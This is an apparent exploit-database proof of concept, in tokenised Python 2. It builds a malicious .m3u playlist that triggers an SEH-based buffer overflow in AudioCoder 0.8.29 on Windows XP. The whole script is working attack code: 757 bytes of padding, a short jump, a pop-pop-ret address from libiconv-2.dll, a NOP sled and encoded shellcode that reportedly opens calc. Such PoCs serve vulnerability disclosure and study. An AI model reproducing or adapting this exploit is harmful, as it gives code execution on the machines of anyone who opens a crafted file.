###########################################################
#[~] Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code execution[SEH]
#[~] Author: sajith
#[~] version: AudioCoder-0.8.29
#[~] vulnerable app link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.29.exe
#[~]Tested in windows Xp sp3,english
###########################################################
import
struct
raw_input
(
"Letz start fuzzing"
)
print
"POC by sajith shetty"
try
:
f
=
open
(
"victim.m3u"
,
"w"
)
header
=
"http://"
buffer
=
5000
junk
=
"\x41"
*
757
nseh
=
"\xeb\x06\x90\x90"
#jmp 6 bytes
seh
=
struct.pack(
'<I'
,
0x66010686
)
#pop pop ret seq from application dll"libiconv-2.dll"
junk2
=
"\x44"
*
(
buffer
-
(
len
(junk
+
nseh
+
seh)))
nops
=
"\x90"
*
100
#calc shellcode
shellcode
=
(
"\xb8\x9d\x01\x15\xd1\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x32\x31\x42\x12\x03\x42\x12\x83\x77\xfd\xf7\x24\x7b\x16\x7e"
"\xc6\x83\xe7\xe1\x4e\x66\xd6\x33\x34\xe3\x4b\x84\x3e\xa1\x67"
"\x6f\x12\x51\xf3\x1d\xbb\x56\xb4\xa8\x9d\x59\x45\x1d\x22\x35"
"\x85\x3f\xde\x47\xda\x9f\xdf\x88\x2f\xe1\x18\xf4\xc0\xb3\xf1"
"\x73\x72\x24\x75\xc1\x4f\x45\x59\x4e\xef\x3d\xdc\x90\x84\xf7"
"\xdf\xc0\x35\x83\xa8\xf8\x3e\xcb\x08\xf9\x93\x0f\x74\xb0\x98"
"\xe4\x0e\x43\x49\x35\xee\x72\xb5\x9a\xd1\xbb\x38\xe2\x16\x7b"
"\xa3\x91\x6c\x78\x5e\xa2\xb6\x03\x84\x27\x2b\xa3\x4f\x9f\x8f"
"\x52\x83\x46\x5b\x58\x68\x0c\x03\x7c\x6f\xc1\x3f\x78\xe4\xe4"
"\xef\x09\xbe\xc2\x2b\x52\x64\x6a\x6d\x3e\xcb\x93\x6d\xe6\xb4"
"\x31\xe5\x04\xa0\x40\xa4\x42\x37\xc0\xd2\x2b\x37\xda\xdc\x1b"
"\x50\xeb\x57\xf4\x27\xf4\xbd\xb1\xd8\xbe\x9c\x93\x70\x67\x75"
"\xa6\x1c\x98\xa3\xe4\x18\x1b\x46\x94\xde\x03\x23\x91\x9b\x83"
"\xdf\xeb\xb4\x61\xe0\x58\xb4\xa3\x83\x3f\x26\x2f\x44"
)
print
len
(junk2)
f.write(header
+
junk
+
nseh
+
seh
+
nops
+
shellcode
+
junk2)
print
"Done!!"
except
:
print
"error!"